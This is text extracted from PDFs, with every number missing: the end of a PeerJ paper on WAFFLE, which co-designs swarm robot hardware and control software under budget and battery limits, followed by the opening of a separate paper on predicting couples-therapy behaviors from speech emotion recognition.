as a result, the duration of the experiment has an impact on the performance: the longer the experiment, the longer the robot can remain on the black zone and contribute to the score. salman et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. when economical constraints are imposed, the design process tends to select low-tier hardware; and designs the control software such that the robots move less and save battery life for a longer experiment duration. no-constraint waffle tends to configure robot swarms whose total cost is close to the maximum possible—see fig. d. indeed, the robot swarms comprise to robots—see fig. g— equipped with high-tier range-&-bearing receivers and transmitters—see fig. . at visual inspection, the robots first form clusters and then slowly converge on a black zone: when the robots find a black zone, they spin in place and block the way for the remaining robots, which are therefore unable to enter the zone. this behavior is obtained with exploration, stop, and attraction—see fig. a. as expected, the performance of the swarm is considerably better than the one achieved when constraints are imposed—see fig. a. monetary-constraint under the constraints imposed by m and m , waffle tends to configure the robot swarm so that the total cost is close to the maximum available budget—see fig. d. the number of robots in the swarm decreases proportionally to the monetary budget—see fig. g. the robots are equipped with high-tier range-&-bearing receivers and long-range range-&-bearing transmitters. in m , however, waffle also selects two low-tier range-&- bearing receivers—see fig. . the robot swarms designed under nc and m behave in a similar way. in m , however, the robots prefer to use the attraction low-level behavior to remain in a black zone, but as the robots are equipped with low-tier range-&-bearing receivers, they often leave the black zone: due to the high loss-probability of low-tier range-&-bearing receivers, the robots often fail to perceive the presence of their peers in their neighborhood. the performance of the swarms designed under m and m is considerably lower than the one achieved under nc: in m and m , the swarm comprises fewer robots as compared to nc—see fig. a. power-constraint in contrast to nc, the swarms configured under p and p have a total cost that is noticeably lower than the maximum possible—see fig. d. this is because the robots are equipped with low-price range-&-bearing transmitters, which reduces the overall cost of the swarm—see fig. d. cheaper range-&-bearing transmitters have a shorter transmission range but have low power consumption, which allows a longer battery life. we observe a major shift in the dominant individual-level behaviors in the produced instances of control software. the robots stop in the first black zone they encounter and limit their movement to save energy—see fig. a. consequently, the swarm splits and becomes unable to gather on the same zone. as a result, the performance drops by approximately % as compared to the performance achieved under nc—see fig. a. monetary-&-power-constraint in all experiments, waffle tends to use all the available monetary budget—see fig. d. in m p and m p , waffle designs swarms that comprise to robots—see fig. g— equipped with any of the range-&-bearing receivers and low-range transmitters. in m p salman et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. 
and m p , however, the number of robots decreases considerably, and the robots are equipped with low-tier range-&-bearing receivers and low-range transmitters—see figs. g and . the control software generated under the monetary-&-power-constraint experiments behaves similarly to that of the power-constraint experiments—see fig. a. due to the increased battery capacity, the swarms produced under m p and m p perform slightly better than the ones produced under p , m p , and m p —see fig. a.

figure: the performance in all nine experiments on each mission is shown at the top. performance of waffle in all nine experiments for each mission: anytime-selection (a), end-time-aggregation (b), and foraging (c). total cost of the swarms configured by waffle for each mission (d–f): . k and k are the minimum and maximum possible cost (in €) of a swarm, respectively. number of robots selected by waffle for each mission (g–i).

figure: the number of instances of a specific hardware combination selected in each experiment. the horizontal axis represents the possible configurations of the range-&-bearing receivers rx rb; the vertical axis represents the possible ranges r of the range-&-bearing transmitters ty rb. here, ∅ represents the case in which the design process does not select any range-&-bearing receiver or transmitter, x ∈ {∅, , , , , , } and y ∈ {∅, , }, as shown in table .

figure: behaviors adopted by the robots in the experiments for the three missions considered: anytime-selection (a), end-time-aggregation (b), and foraging (c). each color represents a behavior. the videos of all experiments are available as online supplementary material (salman, ligot & birattari, ).

end-time-aggregation
the performance of a designed swarm depends solely on the number of robots that are on the black zone at the end of an experiment. contrary to anytime-selection, if economic constraints are applied, the design process tends to select high-tier hardware, and the control software is composed of individual-level behaviors that keep the robots assembled on a black zone.

no-constraint
waffle tends to configure robot swarms whose total cost is close to the maximum possible—see fig. e. the hardware configuration is similar to the one generated under nc for anytime-selection. indeed, the robot swarms comprise to robots—see fig. h—equipped with high-tier range-&-bearing receivers and transmitters—see fig. . upon visual inspection, the robots first form clusters and then converge on a black zone: the robots tend to remain there by spinning in place until the end of the experiment.
this behavior is obtained with exploration, attraction, and stop—see fig. b. the performance of the swarm is considerably better than that achieved when constraints are imposed—see fig. b.

monetary-constraint
under the constraints imposed by m and m , waffle tends to configure the robot swarm so that the total cost is close to the maximum available budget—see fig. e. the number of robots in the swarm decreases proportionally to the monetary budget—see fig. h. the robots are equipped with long-range range-&-bearing transmitters and high-tier receivers, except for a small minority of configurations in which the robots are equipped with low-tier receivers—see fig. . upon visual inspection, in m and m the robots converge on a black zone and stay there until the end of the experiments. contrary to nc, the robots stop on the black zone instead of spinning in place: the dominant individual-level behaviors are exploration, attraction, and stop—see fig. b. the amount of available monetary budget has a direct impact on the performance of a swarm. indeed, due to the limited monetary budget, the number of robots decreases in the swarms designed under m and m , which results in a considerable performance drop as compared to the performance achieved under nc—see fig. b.

power-constraint
similar to nc, under the constraints imposed by p and p , waffle tends to configure the robot swarm so that the total cost is close to the maximum possible—see fig. e. indeed, the robot swarms comprise to robots—see fig. h—equipped with high-tier range-&-bearing receivers and long-range transmitters—see fig. . however, this selection of hardware has a direct impact on the duration of the experiments due to its high current rating. as most of the power is consumed by the motors, the designed control software avoids the exploration behavior for moving the robots in the arena. in some instances of control software, the robots use the phototaxis and anti-phototaxis individual-level behaviors to move straight and avoid obstacles. moreover, the most dominant individual-level behavior is attraction, which is used to keep the robots assembled on one zone—see fig. b. the performance achieved under p is relatively higher than the one achieved under p . due to the limited battery capacity, which affects the total experiment duration, the swarms designed under p and p have a lower performance than those designed under nc—see fig. b.

monetary-&-power-constraint
in all experiments, waffle tends to use all the available monetary budget—see fig. e. in m p and m p , waffle designs swarms that comprise to robots—see fig. h—equipped with high-tier range-&-bearing receivers and long-range transmitters—see fig. . in m p and m p , the number of robots decreases considerably, and the robots are equipped with high-tier range-&-bearing receivers and long-range transmitters, except for a small minority of configurations in which the robots are equipped with low-tier receivers—see fig. . the instances of control software produced are similar to those produced under the power-constraint: the movement of the robots in the arena is identical and the prominent individual-level behavior is attraction—see fig. b. the performance achieved under m p and m p is slightly better than the one achieved under m p and m p : the level of monetary budget is the key factor that determines whether waffle selects fewer or more robots—see fig. b.
foraging
similar to anytime-selection, the performance of the swarms designed in the foraging experiments depends on the experiment duration, but it also depends on the total number of robots. contrary to both anytime-selection and end-time-aggregation, the individual robots do not rely on the range-&-bearing hardware. the control software produced enables effective movement between source and nest.

all categories of constraints
under all the categories of constraints considered, waffle produced robot swarms sharing the same hardware configuration. this is because, in foraging, the robots do not rely on local communication. as a result, the selected hardware configuration typically does not include a range-&-bearing transmitter and receiver—see fig. . the total cost of a swarm is between , € and , €—see fig. f. the swarm comprises the largest possible number of robots—see fig. i. all instances of control software produced in all experiments exhibit an unexpected behavior. although, in all foraging experiments, the robots are not equipped with range-&-bearing modules, the most prominent individual-level behaviors are attraction and repulsion, which the robots use to explore the arena—see fig. c. the swarm uses these behaviors in a way that is completely different from the one originally intended (francesca et al., ). the reason behind this anomaly is that the individual-level behaviors in the design space are not strictly associated with the related hardware. in the absence of range-&-bearing receivers and transmitters, the attraction and repulsion behaviors cause the robots to move straight, using the proximity sensors to avoid obstacles. in all foraging experiments, waffle selects the phototaxis individual-level behavior to locate the nest in the arena, as shown in fig. c. there is no prominent performance difference between the experiments under the no-constraint and monetary-constraint categories—see fig. c. however, we observe a considerable performance drop for the swarms designed under the categories of experiments that have limited battery capacity—that is, power-constraint and monetary-&-power-constraint. indeed, the performance achieved in the experiments with mah battery capacity—i.e., p , m p , and m p —is considerably better than the performance achieved in the experiments with mah battery capacity—i.e., p , m p , and m p —see fig. c.

conclusions
in this paper, we studied the concurrent automatic design of control software and the automatic configuration of the hardware of robot swarms. in particular, we showed that it is possible to concurrently design control software and hardware for a robot swarm using the principles of automatic modular design. we introduced waffle, a new instance of the automode family of automatic design methods that configures the robot hardware, selects the number of robots in the swarm, and produces control software in the form of a probabilistic finite state machine by combining pre-existing modules that are mission independent. we studied waffle under economic constraints on the total monetary budget available and on the battery capacity of each individual robot comprised in the swarm. we tested waffle on three different collective missions. in the experiments presented in the paper, waffle was able to concurrently design the control software and configure the hardware of a robot swarm.
the results suggest that the hardware configuration of the individual robots, the design of the control software, and the number of robots highly depend on the nature of the collective mission and the economic constraints imposed. in the paper, we only considered the automatic configuration of one type of hardware module; future studies will focus on extending the automatic design to other sensors and actuators. the range-&-bearing receivers and transmitters proposed in the paper can be manufactured, and real-robot experiments can be performed to assess the robustness of the selected configuration to the reality gap.

additional information and declarations

funding
the research has received funding from the european research council (erc) under the european union's horizon research and innovation programme (grant agreement no ). mauro birattari received support from the belgian fonds de la recherche scientifique – fnrs. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript.

grant disclosures
the following grant information was disclosed by the authors:
european research council (erc).
belgian fonds de la recherche scientifique – fnrs.

competing interests
mauro birattari is an academic editor for peerj.

author contributions
• muhammad salman conceived and designed the experiments, performed the experiments, analyzed the data, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft.
• antoine ligot performed the computation work, authored or reviewed drafts of the paper, approved the final draft.
• mauro birattari contributed reagents/materials/analysis tools, conceived and designed the experiments, analyzed the data, directed the research, authored or reviewed drafts of the paper, approved the final draft.

data availability
the following information was supplied regarding data availability:
the data is available at iridia - supplementary information, id: iridiasupp - : http://iridia.ulb.ac.be/supp/iridiasupp - /.

references
birattari m, ligot a, bozhinoski d, brambilla m, francesca g, garattoni l, garzón ramos d, hasselmann k, kegeleirs m, kuckling j, pagnozzi f, roli a, salman m, stützle t. automatic off-line design of robot swarms: a manifesto. frontiers in robotics and ai.
brambilla m, brutschy a, dorigo m, birattari m. property-driven design for swarm robotics: a design method based on prescriptive modeling and model checking. acm transactions on autonomous and adaptive systems.
brambilla m, ferrante e, birattari m, dorigo m. swarm robotics: a review from the swarm engineering perspective. swarm intelligence.
carlone l, pinciroli c. robot co-design: beyond the monotone case. arxiv preprint.
clark aj, moore jm, wang j, tan x, mckinley pk. evolutionary design and experimental validation of a flexible caudal fin for robotic fish. in: artificial life conference proceedings. cambridge: mit press.
dorigo m, birattari m, brambilla m. swarm robotics. scholarpedia.
francesca g, brambilla m, brutschy a, garattoni l, miletitch r, podevijn g, reina a, soleymani t, salvaro m, pinciroli c, birattari m. automode-chocolate: automatic design of control software for robot swarms. swarm intelligence.
francesca g, brambilla m, brutschy a, trianni v, birattari m. automode: a novel approach to the automatic design of control software for robot swarms. swarm intelligence.
garattoni l, francesca g, brutschy a, pinciroli c, birattari m. software infrastructure for e-puck (and tam). technical report tr/iridia, iridia, université libre de bruxelles, belgium.
gutiérrez á, campo a, dorigo m, donate j, monasterio-huelin f, magdalena l. open e-puck range & bearing miniaturized board for local communication in swarm robotics. in: kosuge k, ed. ieee international conference on robotics and automation, icra. piscataway: ieee press.
hamann h. towards swarm calculus: universal properties of swarm performance and collective decisions. berlin: springer.
hamann h, wörn h. a framework of space–time continuous models for algorithm design in swarm robotics. swarm intelligence.
hasselmann k, ligot a, francesca g, birattari m. reference models for automode. technical report tr/iridia, iridia, université libre de bruxelles, belgium.
hasselmann k, robert f, birattari m. automatic design of communication-based behaviors for robot swarms. in: dorigo m, ed. swarm intelligence, ants, lncs. cham: springer.
heinerman j, rango m, eiben ae. evolution, individual learning, and social learning in a swarm of real robots. in: ieee symposium series on computational intelligence. piscataway: ieee press.
hewland j, nitschke gs. the benefits of adaptive behavior and morphology for cooperation. in: ieee symposium series on computational intelligence. piscataway: ieee press.
hornby gs, lipson h, pollack jb. generative representations for the automated design of modular physical robots. ieee transactions on robotics and automation.
kuckling j, ligot a, bozhinoski d, birattari m. behavior trees as a control architecture in the automatic modular design of robot swarms. in: dorigo m, ed. swarm intelligence, ants, lncs. cham: springer.
lerman k, galstyan a. mathematical model of foraging in a group of robots: effect of interference. autonomous robots.
lipson h, pollack jb. automatic design and manufacture of robotic lifeforms. nature.
lopes yk, trenkwalder sm, leal ab, dodd tj, groß r. supervisory control theory applied to swarm robotics. swarm intelligence.
lópez-ibáñez m, dubois-lacoste j, pérez cáceres l, birattari m, stützle t. the irace package: iterated racing for automatic algorithm configuration. operations research perspectives.
macinnes i. visually guided physically simulated agents with evolved morphologies. in: advances in artificial life. berlin: springer.
mondada f, bonani m, raemy x, pugh j, cianci c, klaptocz a, magnenat s, zufferey j-c, floreano d, martinoli a. the e-puck, a robot designed for education in engineering. in: gonçalves p, torres p, alves c, eds. proceedings of the conference on autonomous robot systems and competitions. portugal: instituto politécnico de castelo branco.
nolfi s, floreano d. evolutionary robotics. cambridge: mit press.
nygaard tf, martin cp, samuelsen e, torresen j, glette k. real-world evolution adapts robot morphology and control to hardware limitations. in: proceedings of the genetic and evolutionary computation conference, gecco. new york: acm press.
pahl g, beitz w, feldhusen j, grote k-h. engineering design: a systematic approach. london: springer.
pinciroli c, trianni v, o'grady r, pini g, brutschy a, brambilla m, mathews n, ferrante e, di caro g, ducatelle f, birattari m, gambardella l, dorigo m. argos: a modular, parallel, multi-engine simulator for multi-robot systems. swarm intelligence.
şahin e. swarm robotics: from sources of inspiration to domains of application. berlin: springer.
salman m, ligot a, birattari m. concurrent design of control software and configuration of hardware for robot swarms under economic constraints: supplementary material. available at http://iridia.ulb.ac.be/supp/iridiasupp - /.
sims k. evolving virtual creatures. in: proceedings of the annual conference on computer graphics and interactive techniques, siggraph. new york: acm press.
trianni v. evolutionary swarm robotics. berlin: springer.
watson j, nitschke g. deriving minimal sensory configurations for evolved cooperative robot teams. in: ieee congress on evolutionary computation (cec). piscataway: ieee press.

linking emotions to behaviors through deep transfer learning
haoqi li, brian baucom and panayiotis georgiou
department of electrical and computer engineering, university of southern california, los angeles, ca, united states of america
department of psychology, university of utah, salt lake city, ut, united states of america
submitted june; accepted november; published january. corresponding author: haoqi li, haoqili@usc.edu. academic editor: meeyoung cha. copyright li et al., distributed under creative commons cc-by. open access.

abstract
human behavior refers to the way humans act and interact. understanding human behavior is a cornerstone of observational practice, especially in psychotherapy. an important cue for behavior analysis is the dynamic change of emotions during the conversation. domain experts integrate emotional information in a highly nonlinear manner; thus, it is challenging to explicitly quantify the relationship between emotions and behaviors. in this work, we employ deep transfer learning to analyze their inferential capacity and contextual importance. we first train a network to quantify emotions from acoustic signals and then use information from the emotion recognition network as features for behavior recognition. we treat this emotion-related information as behavioral primitives and further train higher level layers towards behavior quantification.
through our analysis, we find that emotion-related information is an important cue for behavior recognition. further, we investigate the importance of emotional context in the expression of behavior by constraining (or not) the neural networks' contextual view of the data. this demonstrates that the sequence of emotions is critical in behavior expression. to achieve these frameworks, we employ hybrid architectures of convolutional networks and recurrent networks to extract emotion-related behavior primitives and facilitate automatic behavior recognition from speech.

subjects: emerging technologies, natural language and speech, social computing
keywords: behavior quantification, emotion, affective computing, neural networks, couples therapy

introduction
human communication includes a range of cues, from lexical, acoustic and prosodic, turn taking, and emotions to complex behaviors. behaviors encode many domain-specific aspects of the internal user state, from highly complex interaction dynamics to expressed emotions. these are encoded at multiple resolutions, time scales, and with different levels of complexity. for example, a short speech signal or a single uttered word can convey basic emotions (ekman, a; ekman, b). more complex behaviors require domain-specific knowledge and longer observation windows for recognition. this is especially true for task-specific behaviors of interest in observational treatment for psychotherapy, such as in couples' therapy (christensen et al., ) and suicide risk assessment (cummins et al., ). behaviors encompass a rich set of information that includes the dynamics of interlocutors and their emotional states, and can often be domain specific. the evaluation and identification of domain-specific behaviors (e.g., blame, suicide ideation) can facilitate effective and specific treatments by psychologists. during the observational treatment, annotation of human behavior is a time-consuming and complex task. thus, there have been efforts on automatically recognizing human emotion and behavior states, which resulted in vibrant research topics such as affective computing (tao & tan, ; picard, ; sander & scherer, ), social signal processing (vinciarelli, pantic & bourlard, ), and behavioral signal processing (bsp) (narayanan & georgiou, ; georgiou, black & narayanan, ). in the task of speech emotion recognition (ser), researchers are combining machine learning techniques to build reliable and accurate affect recognition systems (schuller, ). in the bsp domain, through a domain-specific focus on areas such as human communication, mental health, and psychology, research targets advances in the understanding of higher-complexity constructs and helps psychologists to observe and evaluate domain-specific behaviors. however, despite these efforts on automatic emotion and behavior recognition (see 'related work'), there has been less work on examining the relationship between these two.
in fact, many domain-specific annotation manuals and instruments (heavey, gill & christensen, ; jones & christensen, ; heyman, ) have clear descriptions stating that specific basic emotions can be indicators of certain behaviors. such descriptions are also congruent with how humans process information. for example, when domain experts attempt to quantify complex behaviors, they often employ affective information within the context of the interaction at varying timescales to estimate behaviors of interest (narayanan & georgiou, ; tseng et al., ). moreover, the relationship between behavior and emotion provides an opportunity for (i) transfer learning by employing emotion data, which is easier to obtain and annotate and is less subjective, as the initial modeling task; and (ii) employing emotional information as building blocks, or primitive features, that can describe behavior. the purpose of this work is to explore the relationship between emotion and behavior through deep neural networks, and further to employ emotion-related information towards behavior quantification.

there are many notions of what an "emotion" is. for the purpose of this paper and most research in the field (el ayadi, kamel & karray, ; schuller, ), the focus is on basic emotions, which are defined as cross-culturally recognizable. one commonly used discrete categorization is by ekman ( a); ekman ( b), in which six basic emotions are identified: anger, disgust, fear, happiness, sadness, and surprise. according to theories (schacter, gilbert & wegner, ; scherer, ), emotions are states of feeling that result in physical and psychological changes that influence our behaviors. behavior, on the other hand, encodes many more layers of complexity: the dynamics of the interlocutors; their perception, appraisal, and expression of emotion; their thinking and problem-solving intents, skills and creativity; the context and knowledge of interlocutors; and their abilities towards emotion regulation (baumeister et al., ; baumeister et al., ). behaviors are also domain dependent. in addiction (baer et al., ), for example, a therapist will mostly be interested in the language which reflects changes in addictive habits. in suicide prevention (cummins et al., ), reasons for living and emotional bonds are more relevant. in doctor-patient interactions, empathy or bedside manners are more applicable.

in this paper, we will first address the task of basic emotion recognition from speech. thus, we will discuss literature on the notion of emotion (see 'emotions') and prior work on emotion recognition (see 'emotion quantification from speech'). we will then, as our first scientific contribution, describe a system that can label emotional speech (see 'emotion recognition'). the focus of this paper, however, is to address the more complex task of behavior analysis. given that behavior is closely related to the dynamics, perception, and expression of emotions (schacter, gilbert & wegner, ), we believe a study is overdue in establishing the degree to which emotions can predict behavior. we will therefore introduce more analytically the notion of behavior (see 'behavior') and describe prior work in behavior recognition (see 'behavior quantification from speech'), mainly from speech signals. the second task of this paper will be establishing a model that can predict behaviors from basic emotions.
we will investigate the emotion-to-behavior aspects in two ways: we will first assume that the discrete emotion labels directly affect behavior (see 'context-dependent behavior recognition from emotion labels'). we will further investigate whether an embedding from the emotion system, representing behaviors but encompassing a wider range of information, can better encode behaviorally meaningful information (see 'context-dependent behavior recognition from emotion-embeddings'). in addition, the notion that behavior is highly dependent on emotional expression also raises the question of how important the sequence of emotional content is in defining behavior. we will investigate this by progressively removing the context from the sequence of emotions in the emotion-to-behavior system (see 'reduced context-dependent behavior recognition from emotion-informed embeddings') and study how this affects the automatic behavior classification performance.

background
emotions
there is no consensus in the literature on a specific definition of emotion. an "emotion" is often taken for granted in itself and, most often, is defined with reference to a list of descriptors such as anger, disgust, happiness, and sadness (cabanac, ). oatley & jenkins ( ) distinguish emotion from mood or preference by the duration of each kind of state. two emotion representation models are commonly employed in practice (schuller, ). one is based on the discrete emotion theory, where six basic emotions are isolated from each other, and researchers assume that any emotion can be represented as a mixture of the basic emotions (cowie et al., ). the other model defines emotions via continuous values along different dimensions; it assumes that emotions change in a continuous manner and have strong internal connections but blurred boundaries between each other. the two most common dimensions are arousal and valence (schlosberg, ). in our work, following the related literature, we will refer to basic emotions as emotions that are expressed and perceived through a short observation window. annotations of such emotions take place without context to ensure that time-scales, back-and-forth interaction dynamics, and domain-specificity are not captured.
while within couples therapy domain, behavior ‘‘positivity’’ is defined in (heavey, gill & christensen, ; jones & christensen, ) as ‘‘overtly expresses warmth, support, acceptance, affection, positive negotiation’’. those differences apply to both human cognition and machine learning aspects of speech capture, emotion recognition and behavior understanding as shown in fig. (soken & pick, ; hoff, ). the increased complexity and contextualization of behavior can be seen both in humans as well as machines. for example, babies start to develop basic emotion perception at the age of seven months (soken & pick, ). however, it takes emotionally mature and emotionally intelligent humans and often trained domain experts to perceive domain-specific behaviors. in fig. , we illustrate the complexity for machine processing along with the age-of-acquisition for humans. we see a parallel in the increase in demands of identifying behavior in both cases. motivations and goals of this work the relationship between emotion and behavior is usually implicit and highly nonlinear. investigating explicit and quantitative associations between behavior and emotions is thus challenging. in this work, based on the deep neural networks’ (dnns) underlying representative capability (bengio, courville & vincent, ; bengio, ), we try to analyze and interpret the relationship between emotion and behavior information through data-driven methods. we investigate the possibility of using transfer learning by employing emotion data as emotional related building blocks, or primitive features, that can describe behavior. further, we design a deep learning framework that employs a hybrid network structure containing context dependent and reduced contextualization causality models to quantitatively analyze the relationship between basic emotions and complex behaviors. li et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. voice activity detection recognize native language energy-based activity detection detect sounds from womb isolated word recognition first word recognition large vocabulary word recognition words recognition k words recognition _ hoff ( ) emotion recognition basic emotion perception _ soken & pick ( ) behavior recognition rich dialog transcription human perception and cognition complexity increasing machine learning task complexity increasing linked to mental health and emotional intelligence infants months old infants months old months old months old years old rich domain-specific behavior recognition soken & pick ( ) emotionally mature adults/experts figure illustration of task complexity or age of acquisition for machines and humans. full-size doi: . /peerjcs. /fig- related work researchers are combining machine learning techniques to build reliable and accurate emotion and behavior recognition systems. speech emotion recognition (ser) systems, of importance in human-computer interactions, enable agents and dialogue systems to act in a more human-like manner as conversational partners (schuller, ). on the other hand, in the domain of behavior signal processing (bsp), efforts have been made in quantitatively understanding and modeling typical, atypical, and distressed human behavior with a specific focus on verbal and non-verbal communicative, affective, and social behaviors (narayanan & georgiou, ). we will briefly review the related work in the following aspects. 
emotion quantification from speech a dominant modality for emotion expression is speech (cowie & cornelius, ). significant efforts (el ayadi, kamel & karray, ; beale & peter, ; schuller et al., ) have focused on automatic speech emotion recognition. traditional emotion recognition systems usually rely on a two-stage approach, in which the feature extraction and classifier training are conducted separately. recently, deep learning has demonstrated promise in emotion classification tasks (han, yu & tashev, ; le & provost, ). convolutional neural networks (cnns) have been shown to be particularly effective in learning affective representations directly from speech spectral features (mao et al., ; anand & verma, ; huang & narayanan, a; zheng, yu & zou, ; aldeneh & provost, ). mao et al. ( ) proposed to learn cnn filters on spectrally whitened spectrograms by an auto-encoder through unsupervised manners. aldeneh & provost ( ) showed that cnns can be directly applied to temporal low-level acoustic features to identify emotionally salient regions. anand & verma ( ) and huang & narayanan ( a) compared multiple kinds of convolutional kernel operations, and showed that the full-spectrum temporal convolution is more favorable for speech emotion recognition tasks. in addition, models with hidden markov model (hmm) (schuller, rigoll & lang, li et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. ), recurrent neural networks (rnns) (wöllmer et al., ; metallinou et al., ; lee & tashev, ) and the hybrid neural network combining cnns and rnns (lim, jang & lee, ; huang & narayanan, b) have also been employed to model emotion affect. behavior quantification from speech behavioral signal processing (bsp) (narayanan & georgiou, ; georgiou, black & narayanan, ) can play a central role in informing human assessment and decision making, especially in assisting domain specialists to observe, evaluate and identify domain-specific human behaviors exhibited over longer time scales. for example, in couples therapy (black et al., ; nasir et al., b), depression (gupta et al., ; nasir et al., ; stasak et al., ; tanaka, yamamoto & haruno, ) and suicide risk assessment (cummins et al., ; venek et al., ; nasir et al., ; nasir et al., a), behavior analysis systems help psychologists observe and evaluate domain-specific behaviors during interactions. li, baucom & georgiou ( ) proposed sparsely connected and disjointly trained deep neural networks to deal with the low-resource data issue in behavior understanding. unsupervised (li, baucom & georgiou, ) and out-of-domain transfer learning (tseng, baucom & georgiou, ) have also been employed on behavior understanding tasks. despite these important and encouraging steps towards behavior quantification, obstacles still remain. due to the end-to-end nature of recent efforts, low- resource data becomes a dominant limitation (li, baucom & georgiou, ; collobert et al., ; soltau, liao & sak, ; heyman et al., ). this is exacerbated in bsp scenario by the difficulty of obtaining data due to privacy constraints (lustgarten, ; narayanan & georgiou, ). challenges with subjectivity and low interannotator agreement (busso & narayanan, ; tseng et al., ), especially in micro and macro annotation complicate the learning task. further, and importantly such end-to-end systems reduce interpretability generalizability and domain transfer (sculley et al., ). 
linking emotion and behavior quantification as mentioned before, domain experts employ information within the context of the interaction at varying timescales to estimate the behaviors of interest (narayanan & georgiou, ; tseng et al., ). specific short-term affect, e.g., certain basic emotions, can be indicators of some complex long-term behaviors during manual annotation process (heavey, gill & christensen, ; jones & christensen, ; heyman, ). these vary according to the behavior; for example, negativity is often associated with localized cues (carney, colvin & hall, ), demand and withdrawal require more context (heavey, christensen & malamuth, ), and coercion requires a much longer context beyond a single interaction (feinberg, kan & hetherington, ). chakravarthula et al. ( ) analyzed behaviors, such as ‘‘anger’’ and ‘‘satisfaction’’, and found that negative behaviors could be quantified using short observation length whereas positive and problem solving behaviors required much longer observation. in addition, baumeister et al. ( ) and baumeister et al. ( ) discussed two kinds of theories: the direct causality model and inner feedback model. both models emphasize the existence of a relationship between basic emotion and complex behavior. literature from psychology (dunlop, wakefield & kashima, ; burum & goldfried, ) and social li et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. science (spector & fox, ) also showed that emotion can have impacts and further shape certain complex human behaviors. to connect basic emotion with more complex affective states, carrillo et al. ( ) identified a relationship between emotional intensity and mood through lexical modality. khorram et al. ( ) verified the significant correlation between predicted emotion and mood state for individuals with bipolar disorder on acoustic modality. all these indicate that the aggregation and link between basic emotions and complex behaviors is of interest and should be examined. proposed work: behavioral primitives our work consists of three studies for estimation of behavior through emotion information as follows: . context-dependent behavior from emotion labels: basic emotion affect labels are directly used to predict long-term behavior labels through a recurrent neural network. this model is used to investigate whether the basic emotion states can be sufficient to infer behaviors. . context-dependent behavior from emotion-informed embeddings: instead of directly using the basic emotion affect labels, we utilize emotion-informed embeddings towards the prediction of behaviors. . reduced context-dependent behavior from emotion-informed embeddings: similar to ( ) above, we employ emotion-informed embeddings. in this case, however, we investigate the importance of context, by progressively reducing the context provided to the neural network in predicting behavior. for all three methods, we utilize a hybrid model of convolution and recurrent neural networks that we will describe in more detail below. through our work, both emotion labels and emotionally informed embeddings will be regarded as a type of behavior primitive, that we call basic affect behavioral primitive information (or behavioral primitives for short, bp). an important step in obtaining the above bp is the underlying emotion recognition system. 
we thus first propose and train a robust multi-emotion regression network (er) using convolutional neural network (cnn), which is described in detail in the following subsection. emotion recognition in order to extract emotionally informed embeddings and labels, we propose a cnn based multi-emotion regression network (er). the er model has a similar architecture as (aldeneh & provost, ), except that we use one-dimensional ( d) cnn kernels and train the network through a regression task. the cnn kernel filter should include entire spectrum information per scan, and shift along the temporal axis, which performs better than other kernel structures according to huang & narayanan ( a). our model has three components: ( ) stacked d convolutional layers; ( ) an adaptive max pooling layer; ( ) stacked dense layers. the input acoustic features are first processed by multiple stacked d convolution layers. filters with different weights are employed to extract different information from the same input sample. then, one adaptive max pooling li et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. layer is employed to further propagate d cnn outputs with the largest value. this is further processed through dense layers to generate the emotional ratings at short-term segment level. the adaptive max pooling layer over time is one of the key components of this and all following models: first, it can cope with variable length signals and produce fixed size embeddings for subsequent dense layers; second, it only returns the maximum feature within the sample to ensure only the more relevant emotionally salient information is propagated through training. we train this model as one regression model which predicts the annotation ratings of all emotions jointly. analogous to the continuous emotion representation model (schlosberg, ), this multi-emotion joint training framework can utilize strong bonds but blurred boundaries within emotions to learn the embeddings. through this joint training process, the model can integrate the relationship across different emotions, and hopefully obtain an affective-rich embedding. in addition, to evaluate the performance of proposed er , we also build multiple binary, single-emotion, classification models (single-emotion classification network (ec)). the ec model is modified based on pre-trained er by replacing the last linear layer with new fully connected layers to classify each single emotion independently. during training, the back propagation only updates the newly added linear layers without changing the weights of pre-trained er model. in this case, the loss from different emotions is not entangled and the weights will be optimized towards each emotion separately. more details of experiments and results comparison are described in ‘experiments and results discussion’. as mentioned before, we employ two kinds of behavioral primitives in order to investigate the relationship between emotions and behaviors, and the selection of these two kinds of bp arises through the discrete, ec, and continuous, er, emotion representation models. the two kinds of bp are: ( ) the discrete vector representation of predicted emotion labels, denoted as b-bp_k, from the single-emotion classification network (ec), where k means kth basic emotion; and ( ) the output embeddings of the cnn layers, denoted as e-bp_ l, from the multi-emotion regression network system (er), where l represents the output from lth cnn layer. 
all these are illustrated in fig. . behavior recognition through emotion-based behavior primitives we now describe three architectures for estimating behavior through basic affect behavioral primitive information (or behavioral primitives for short, bp). the three methods employ full context of the emotion labels from the single-emotion classification network (ec), the full context from the embeddings of the multi-emotion regression network (er) system, and increasingly reduced context from the multi-emotion regression network system (er). context-dependent behavior recognition from emotion labels in this approach, the binarized predicted labels from the ec system are employed to predict long-term behaviors via sequential models in order to investigate relationships between emotions and behaviors. such a design can inform the degree to which short-term emotion can influence behaviors. it can also provide some interpretability of the employed li et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. binarized emotion-vector behavior primitives (b-bp) b-bp_ acoustic features d cnn d cnn d cnn l* d cnn l/ * l/ * l/ * l/ * * emotion ratings emotion binary label input from er e-bp_ e-bp_ e-bp_ . . . e-bp_ er multi-emotion regression network (er) behavior primitives single-emotion classification network (ec) fc fc fc fc fully connected layer (fc) fc fc b-bp_ b-bp_ . . . max pooling emotion embedding behavior primitives (e-bp) single emotion classifiers figure models of er, ec and two kinds of bps. l is the input feature length. full-size doi: . /peerjcs. /fig- information for decision making, over end-to-end systems that generate predictions directly from the audio features. we utilize the single-emotion classification network (ec) described in the previous section to obtain the predicted binarized emotion-vector behavior primitives (b-bp) on shorter speech segment windows as behavioral primitives. these are extracted from the longer signals that describe the behavioral corpus and are utilized, preserving sequence, hence context, within a recurrent neural network for predicting the behavior labels. figure 